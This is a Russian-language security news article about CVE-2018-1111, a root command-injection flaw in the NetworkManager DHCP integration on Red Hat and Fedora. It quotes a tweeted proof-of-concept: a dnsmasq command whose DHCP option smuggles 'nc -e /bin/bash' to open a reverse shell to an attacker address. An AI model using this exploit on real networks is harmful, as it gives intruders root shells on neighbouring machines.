Инженер Google Security Team Феликс Вильгельм (Felix Wilhelm) обнаружил критическую уязвимость в DHCP-клиенте, который используется в Red Hat Linux и его производных, к примеру, Fedora. Баг получил идентификатор CVE-2018-1111 и может использоваться для выполнения произвольных команд в уязвимой системе с root-привилегиями.
Уязвимость была связана с работой скрипта интеграции NetworkManager. Вильгельм пишет, что проблема позволяла атакующему с вредоносным DHCP-сервером или подключенному к той же сети, что и жертва, подделать ответы DHCP, что в итоге заставит систему с уязвимым NetworkManager и DHCP-клиентом выполнить произвольные команды злоумышленника.
Хотя все технически детали проблемы пока не были обнародованы, эксперт заявил, что PoC-эксплоит для уязвимости настолько мал, что умещается в одно сообщение в Twitter. Вскоре после этого ИБ-специалист из Турции доказал правоту Вильгельма, опубликовав эксплоит в своем микроблоге.
#CVE-2018-1111 tweetable PoC 🙂 dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat pic.twitter.com/vUICm2HluC
— Barkın Kılıç (@Barknkilic) May 15, 2018
Специалисты Red Hat подтвердили серьезность проблемы, выпустили исправления и сообщили, что она затрагивает Red Hat Enterprise Linux 6 и 7, также подтверждена уязвимость Fedora. Другие дистрибутивы, такие как OpenSUSE и Ubuntu, проблема не затронула, так как они не используют скрипт интеграции NetworkManager.